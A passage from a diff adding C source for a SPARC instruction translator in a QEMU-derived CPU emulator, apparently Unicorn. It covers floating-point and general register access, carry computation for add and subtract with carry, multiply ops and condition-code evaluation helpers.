tcg_gen_trunc_i64_i32(tcg_ctx, ret, t); + tcg_temp_free_i64(tcg_ctx, t); + + return ret; + } +#endif +} + +static void gen_store_fpr_F(DisasContext *dc, unsigned int dst, TCGv_i32 v) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; +#if TCG_TARGET_REG_BITS == 32 + if (dst & 1) { + tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx->cpu_fpr[dst / 2]), v); + } else { + tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx->cpu_fpr[dst / 2]), v); + } +#else + TCGv_i64 t = MAKE_TCGV_I64(GET_TCGV_I32(v)); + tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], tcg_ctx->cpu_fpr[dst / 2], t, + (dst & 1 ? 0 : 32), 32); +#endif + gen_update_fprs_dirty(dc, dst); +} + +static TCGv_i32 gen_dest_fpr_F(DisasContext *dc) +{ + return get_temp_i32(dc); +} + +static TCGv_i64 gen_load_fpr_D(DisasContext *dc, unsigned int src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + src = DFPREG(src); + return tcg_ctx->cpu_fpr[src / 2]; +} + +static void gen_store_fpr_D(DisasContext *dc, unsigned int dst, TCGv_i64 v) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + dst = DFPREG(dst); + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], v); + gen_update_fprs_dirty(dc, dst); +} + +static TCGv_i64 gen_dest_fpr_D(DisasContext *dc, unsigned int dst) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + return tcg_ctx->cpu_fpr[DFPREG(dst) / 2]; +} + +static void gen_op_load_fpr_QT0(DisasContext *dc, unsigned int src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src / 2], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + + offsetof(CPU_QuadU, ll.upper)); + tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src/2 + 1], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + + offsetof(CPU_QuadU, ll.lower)); +} + +static void gen_op_load_fpr_QT1(DisasContext *dc, unsigned int src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src / 2], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt1) + + offsetof(CPU_QuadU, ll.upper)); + tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src/2 + 1], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt1) + + offsetof(CPU_QuadU, ll.lower)); +} + +static void gen_op_store_QT0_fpr(DisasContext *dc, unsigned int dst) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + + offsetof(CPU_QuadU, ll.upper)); + tcg_gen_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst/2 + 1], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + + offsetof(CPU_QuadU, ll.lower)); +} + +#ifdef TARGET_SPARC64 +static void gen_move_Q(DisasContext *dc, unsigned int rd, unsigned int rs) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + rd = QFPREG(rd); + rs = QFPREG(rs); + + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], tcg_ctx->cpu_fpr[rs / 2]); + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2 + 1], tcg_ctx->cpu_fpr[rs / 2 + 1]); + gen_update_fprs_dirty(dc, rd); +} +#endif + +/* moves */ +#ifdef CONFIG_USER_ONLY +#define supervisor(dc) 0 +#ifdef TARGET_SPARC64 +#define hypervisor(dc) 0 +#endif +#else +#define supervisor(dc) (dc->mem_idx >= MMU_KERNEL_IDX) +#ifdef TARGET_SPARC64 +#define hypervisor(dc) (dc->mem_idx == MMU_HYPV_IDX) +#else +#endif +#endif + +#ifdef TARGET_SPARC64 +#ifndef TARGET_ABI32 +#define AM_CHECK(dc) ((dc)->address_mask_32bit) +#else +#define AM_CHECK(dc) (1) +#endif +#endif + +static inline void gen_address_mask(DisasContext *dc, TCGv addr) +{ +#ifdef TARGET_SPARC64 + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (AM_CHECK(dc)) + tcg_gen_andi_tl(tcg_ctx, addr, addr, 0xffffffffULL); +#endif +} + +static inline TCGv gen_load_gpr(DisasContext *dc, int reg) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (reg == 0 || reg >= 8) { + TCGv t = get_temp_tl(dc); + if (reg == 0) { + tcg_gen_movi_tl(tcg_ctx, t, 0); + } else { + tcg_gen_ld_tl(tcg_ctx, t, tcg_ctx->cpu_regwptr, (reg - 8) * sizeof(target_ulong)); + } + return t; + } else { + TCGv **cpu_gregs = (TCGv **)tcg_ctx->cpu_gregs; + return *cpu_gregs[reg]; + } +} + +static inline void gen_store_gpr(DisasContext *dc, int reg, TCGv v) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (reg > 0) { + if (reg < 8) { + TCGv **cpu_gregs = (TCGv **)tcg_ctx->cpu_gregs; + tcg_gen_mov_tl(tcg_ctx, *cpu_gregs[reg], v); + } else { + tcg_gen_st_tl(tcg_ctx, v, tcg_ctx->cpu_regwptr, (reg - 8) * sizeof(target_ulong)); + } + } +} + +static inline TCGv gen_dest_gpr(DisasContext *dc, int reg) +{ + if (reg == 0 || reg >= 8) { + return get_temp_tl(dc); + } else { + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv **cpu_gregs = (TCGv **)tcg_ctx->cpu_gregs; + return *cpu_gregs[reg]; + } +} + +static inline void gen_goto_tb(DisasContext *s, int tb_num, + target_ulong pc, target_ulong npc) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TranslationBlock *tb; + + tb = s->tb; + if ((pc & TARGET_PAGE_MASK) == (tb->pc & TARGET_PAGE_MASK) && + (npc & TARGET_PAGE_MASK) == (tb->pc & TARGET_PAGE_MASK) && + !s->singlestep) { + /* jump to same page: we can use a direct jump */ + tcg_gen_goto_tb(tcg_ctx, tb_num); + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, pc); + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, npc); + tcg_gen_exit_tb(tcg_ctx, (uintptr_t)tb + tb_num); + } else { + /* jump to another page: currently not optimized */ + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, pc); + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, npc); + tcg_gen_exit_tb(tcg_ctx, 0); + } +} + +// XXX suboptimal +static inline void gen_mov_reg_N(DisasContext *dc, TCGv reg, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + + tcg_gen_extu_i32_tl(tcg_ctx, reg, src); + tcg_gen_shri_tl(tcg_ctx, reg, reg, PSR_NEG_SHIFT); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); +} + +static inline void gen_mov_reg_Z(DisasContext *dc, TCGv reg, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + + tcg_gen_extu_i32_tl(tcg_ctx, reg, src); + tcg_gen_shri_tl(tcg_ctx, reg, reg, PSR_ZERO_SHIFT); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); +} + +static inline void gen_mov_reg_V(DisasContext *dc, TCGv reg, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + + tcg_gen_extu_i32_tl(tcg_ctx, reg, src); + tcg_gen_shri_tl(tcg_ctx, reg, reg, PSR_OVF_SHIFT); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); +} + +static inline void gen_mov_reg_C(DisasContext *dc, TCGv reg, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + + tcg_gen_extu_i32_tl(tcg_ctx, reg, src); + tcg_gen_shri_tl(tcg_ctx, reg, reg, PSR_CARRY_SHIFT); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); +} + +#if 0 +static inline void gen_op_addi_cc(DisasContext *dc, TCGv dst, TCGv src1, target_long src2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1); + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_gen_addi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, *(TCGv *)tcg_ctx->cpu_cc_src, src2); + tcg_gen_mov_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_cc_dst); +} +#endif + +static inline void gen_op_add_cc(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_gen_add_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, *(TCGv *)tcg_ctx->cpu_cc_src, *(TCGv *)tcg_ctx->cpu_cc_src2); + tcg_gen_mov_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_cc_dst); +} + +static TCGv_i32 gen_add32_carry32(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 carry_32, cc_src1_32, cc_src2_32; + + /* Carry is computed from a previous add: (dst < src) */ +#if TARGET_LONG_BITS == 64 + cc_src1_32 = tcg_temp_new_i32(tcg_ctx); + cc_src2_32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, cc_src1_32, *(TCGv *)tcg_ctx->cpu_cc_dst); + tcg_gen_trunc_i64_i32(tcg_ctx, cc_src2_32, *(TCGv *)tcg_ctx->cpu_cc_src); +#else + cc_src1_32 = *(TCGv *)tcg_ctx->cpu_cc_dst; + cc_src2_32 = *(TCGv *)tcg_ctx->cpu_cc_src; +#endif + + carry_32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, carry_32, cc_src1_32, cc_src2_32); + +#if TARGET_LONG_BITS == 64 + tcg_temp_free_i32(tcg_ctx, cc_src1_32); + tcg_temp_free_i32(tcg_ctx, cc_src2_32); +#endif + + return carry_32; +} + +static TCGv_i32 gen_sub32_carry32(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 carry_32, cc_src1_32, cc_src2_32; + + /* Carry is computed from a previous borrow: (src1 < src2) */ +#if TARGET_LONG_BITS == 64 + cc_src1_32 = tcg_temp_new_i32(tcg_ctx); + cc_src2_32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, cc_src1_32, *(TCGv *)tcg_ctx->cpu_cc_src); + tcg_gen_trunc_i64_i32(tcg_ctx, cc_src2_32, *(TCGv *)tcg_ctx->cpu_cc_src2); +#else + cc_src1_32 = *(TCGv *)tcg_ctx->cpu_cc_src; + cc_src2_32 = *(TCGv *)tcg_ctx->cpu_cc_src2; +#endif + + carry_32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, carry_32, cc_src1_32, cc_src2_32); + +#if TARGET_LONG_BITS == 64 + tcg_temp_free_i32(tcg_ctx, cc_src1_32); + tcg_temp_free_i32(tcg_ctx, cc_src2_32); +#endif + + return carry_32; +} + +static void gen_op_addx_int(DisasContext *dc, TCGv dst, TCGv src1, + TCGv src2, int update_cc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 carry_32; + TCGv carry; + + switch (dc->cc_op) { + case CC_OP_DIV: + case CC_OP_LOGIC: + /* Carry is known to be zero. Fall back to plain ADD. */ + if (update_cc) { + gen_op_add_cc(dc, dst, src1, src2); + } else { + tcg_gen_add_tl(tcg_ctx, dst, src1, src2); + } + return; + + case CC_OP_ADD: + case CC_OP_TADD: + case CC_OP_TADDTV: + if (TARGET_LONG_BITS == 32) { + /* We can re-use the host's hardware carry generation by using + an ADD2 opcode. We discard the low part of the output. + Ideally we'd combine this operation with the add that + generated the carry in the first place. */ + carry = tcg_temp_new(tcg_ctx); + tcg_gen_add2_tl(tcg_ctx, carry, dst, *(TCGv *)tcg_ctx->cpu_cc_src, src1, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_temp_free(tcg_ctx, carry); + goto add_done; + } + carry_32 = gen_add32_carry32(dc); + break; + + case CC_OP_SUB: + case CC_OP_TSUB: + case CC_OP_TSUBTV: + carry_32 = gen_sub32_carry32(dc); + break; + + default: + /* We need external help to produce the carry. */ + carry_32 = tcg_temp_new_i32(tcg_ctx); + gen_helper_compute_C_icc(tcg_ctx, carry_32, tcg_ctx->cpu_env); + break; + } + +#if TARGET_LONG_BITS == 64 + carry = tcg_temp_new(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, carry, carry_32); +#else + carry = carry_32; +#endif + + tcg_gen_add_tl(tcg_ctx, dst, src1, src2); + tcg_gen_add_tl(tcg_ctx, dst, dst, carry); + + tcg_temp_free_i32(tcg_ctx, carry_32); +#if TARGET_LONG_BITS == 64 + tcg_temp_free(tcg_ctx, carry); +#endif + + add_done: + if (update_cc) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_ADDX); + dc->cc_op = CC_OP_ADDX; + } +} + +#if 0 +static inline void gen_op_subi_cc(DisasContext *dc, TCGv dst, TCGv src1, target_long src2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1); + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + if (src2 == 0) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, src1); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } else { + tcg_gen_subi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, *(TCGv *)tcg_ctx->cpu_cc_src, src2); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUB); + dc->cc_op = CC_OP_SUB; + } + tcg_gen_mov_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_cc_dst); +} +#endif + +static inline void gen_op_sub_cc(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_gen_sub_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, *(TCGv *)tcg_ctx->cpu_cc_src, *(TCGv *)tcg_ctx->cpu_cc_src2); + tcg_gen_mov_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_cc_dst); +} + +static void gen_op_subx_int(DisasContext *dc, TCGv dst, TCGv src1, + TCGv src2, int update_cc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv_i32 carry_32; + TCGv carry; + + switch (dc->cc_op) { + case CC_OP_DIV: + case CC_OP_LOGIC: + /* Carry is known to be zero. Fall back to plain SUB. */ + if (update_cc) { + gen_op_sub_cc(dc, dst, src1, src2); + } else { + tcg_gen_sub_tl(tcg_ctx, dst, src1, src2); + } + return; + + case CC_OP_ADD: + case CC_OP_TADD: + case CC_OP_TADDTV: + carry_32 = gen_add32_carry32(dc); + break; + + case CC_OP_SUB: + case CC_OP_TSUB: + case CC_OP_TSUBTV: + if (TARGET_LONG_BITS == 32) { + /* We can re-use the host's hardware carry generation by using + a SUB2 opcode. We discard the low part of the output. + Ideally we'd combine this operation with the add that + generated the carry in the first place. */ + carry = tcg_temp_new(tcg_ctx); + tcg_gen_sub2_tl(tcg_ctx, carry, dst, *(TCGv *)tcg_ctx->cpu_cc_src, src1, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_temp_free(tcg_ctx, carry); + goto sub_done; + } + carry_32 = gen_sub32_carry32(dc); + break; + + default: + /* We need external help to produce the carry. */ + carry_32 = tcg_temp_new_i32(tcg_ctx); + gen_helper_compute_C_icc(tcg_ctx, carry_32, tcg_ctx->cpu_env); + break; + } + +#if TARGET_LONG_BITS == 64 + carry = tcg_temp_new(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, carry, carry_32); +#else + carry = carry_32; +#endif + + tcg_gen_sub_tl(tcg_ctx, dst, src1, src2); + tcg_gen_sub_tl(tcg_ctx, dst, dst, carry); + + tcg_temp_free_i32(tcg_ctx, carry_32); +#if TARGET_LONG_BITS == 64 + tcg_temp_free(tcg_ctx, carry); +#endif + + sub_done: + if (update_cc) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUBX); + dc->cc_op = CC_OP_SUBX; + } +} + +static inline void gen_op_mulscc(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv r_temp, zero, t0; + + r_temp = tcg_temp_new(tcg_ctx); + t0 = tcg_temp_new(tcg_ctx); + + /* old op: + if (!(env->y & 1)) + T1 = 0; + */ + zero = tcg_const_tl(tcg_ctx, 0); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, src1, 0xffffffff); + tcg_gen_andi_tl(tcg_ctx, r_temp, *(TCGv *)tcg_ctx->cpu_y, 0x1); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src2, src2, 0xffffffff); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, *(TCGv *)tcg_ctx->cpu_cc_src2, r_temp, zero, + zero, *(TCGv *)tcg_ctx->cpu_cc_src2); + tcg_temp_free(tcg_ctx, zero); + + // b2 = T0 & 1; + // env->y = (b2 << 31) | (env->y >> 1); + tcg_gen_andi_tl(tcg_ctx, r_temp, *(TCGv *)tcg_ctx->cpu_cc_src, 0x1); + tcg_gen_shli_tl(tcg_ctx, r_temp, r_temp, 31); + tcg_gen_shri_tl(tcg_ctx, t0, *(TCGv *)tcg_ctx->cpu_y, 1); + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x7fffffff); + tcg_gen_or_tl(tcg_ctx, t0, t0, r_temp); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_y, t0, 0xffffffff); + + // b1 = N ^ V; + gen_mov_reg_N(dc, t0, tcg_ctx->cpu_psr); + gen_mov_reg_V(dc, r_temp, tcg_ctx->cpu_psr); + tcg_gen_xor_tl(tcg_ctx, t0, t0, r_temp); + tcg_temp_free(tcg_ctx, r_temp); + + // T0 = (b1 << 31) | (T0 >> 1); + // src1 = T0; + tcg_gen_shli_tl(tcg_ctx, t0, t0, 31); + tcg_gen_shri_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, *(TCGv *)tcg_ctx->cpu_cc_src, 1); + tcg_gen_or_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, *(TCGv *)tcg_ctx->cpu_cc_src, t0); + tcg_temp_free(tcg_ctx, t0); + + tcg_gen_add_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, *(TCGv *)tcg_ctx->cpu_cc_src, *(TCGv *)tcg_ctx->cpu_cc_src2); + + tcg_gen_mov_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_cc_dst); +} + +static inline void gen_op_multiply(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2, int sign_ext) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; +#if TARGET_LONG_BITS == 32 + if (sign_ext) { + tcg_gen_muls2_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_y, src1, src2); + } else { + tcg_gen_mulu2_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_y, src1, src2); + } +#else + TCGv t0 = tcg_temp_new_i64(tcg_ctx); + TCGv t1 = tcg_temp_new_i64(tcg_ctx); + + if (sign_ext) { + tcg_gen_ext32s_i64(tcg_ctx, t0, src1); + tcg_gen_ext32s_i64(tcg_ctx, t1, src2); + } else { + tcg_gen_ext32u_i64(tcg_ctx, t0, src1); + tcg_gen_ext32u_i64(tcg_ctx, t1, src2); + } + + tcg_gen_mul_i64(tcg_ctx, dst, t0, t1); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + + tcg_gen_shri_i64(tcg_ctx, *(TCGv *)tcg_ctx->cpu_y, dst, 32); +#endif +} + +static inline void gen_op_umul(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2) +{ + /* zero-extend truncated operands before multiplication */ + gen_op_multiply(dc, dst, src1, src2, 0); +} + +static inline void gen_op_smul(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2) +{ + /* sign-extend truncated operands before multiplication */ + gen_op_multiply(dc, dst, src1, src2, 1); +} + +// 1 +static inline void gen_op_eval_ba(DisasContext *dc, TCGv dst) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_movi_tl(tcg_ctx, dst, 1); +} + +// Z +static inline void gen_op_eval_be(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + gen_mov_reg_Z(dc, dst, src); +} + +// Z | (N ^ V) +static inline void gen_op_eval_ble(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_N(dc, t0, src); + gen_mov_reg_V(dc, dst, src); + tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); + gen_mov_reg_Z(dc, t0, src); + tcg_gen_or_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// N ^ V +static inline void gen_op_eval_bl(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_V(dc, t0, src); + gen_mov_reg_N(dc, dst, src); + tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// C | Z +static inline void gen_op_eval_bleu(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_Z(dc, t0, src); + gen_mov_reg_C(dc, dst, src); + tcg_gen_or_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// C +static inline void gen_op_eval_bcs(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + gen_mov_reg_C(dc, dst, src); +} + +// V +static inline void gen_op_eval_bvs(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + gen_mov_reg_V(dc, dst, src); +} + +// 0 +static inline void gen_op_eval_bn(DisasContext *dc, TCGv dst) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_movi_tl(tcg_ctx, dst, 0); +} + +// N +static inline void gen_op_eval_bneg(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + gen_mov_reg_N(dc, dst, src); +} + +// !Z +static inline void gen_op_eval_bne(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_mov_reg_Z(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !(Z | (N ^ V)) +static inline void gen_op_eval_bg(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_op_eval_ble(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !(N ^ V) +static inline void gen_op_eval_bge(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_op_eval_bl(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !(C | Z) +static inline void gen_op_eval_bgu(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_op_eval_bleu(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !C +static inline void gen_op_eval_bcc(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_mov_reg_C(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !N +static inline void gen_op_eval_bpos(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_mov_reg_N(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !V +static inline void gen_op_eval_bvc(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_mov_reg_V(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +/* + FPSR bit field FCC1 | FCC0: + 0 = + 1 < + 2 > + 3 unordered +*/ +static inline void gen_mov_reg_FCC0(DisasContext *dc, TCGv reg, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_shri_tl(tcg_ctx, reg, src, FSR_FCC0_SHIFT + fcc_offset); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); +} + +static inline void gen_mov_reg_FCC1(DisasContext *dc, TCGv reg, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_shri_tl(tcg_ctx, reg, src, FSR_FCC1_SHIFT + fcc_offset); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); +} + +// !0: FCC0 | FCC1 +static inline void gen_op_eval_fbne(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_or_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// 1 or 2: FCC0 ^ FCC1 +static inline void gen_op_eval_fblg(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// 1 or 3: FCC0 +static inline void gen_op_eval_fbul(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); +} + +// 1: FCC0 & !FCC1 +static inline void gen_op_eval_fbl(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_andc_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// 2 or 3: FCC1 +static inline void gen_op_eval_fbug(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + gen_mov_reg_FCC1(dc, dst, src, fcc_offset); +} + +// 2: !FCC0 & FCC1 +static inline void gen_op_eval_fbg(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_andc_tl(tcg_ctx, dst, t0, dst); + tcg_temp_free(tcg_ctx, t0); +} + +// 3: FCC0 & 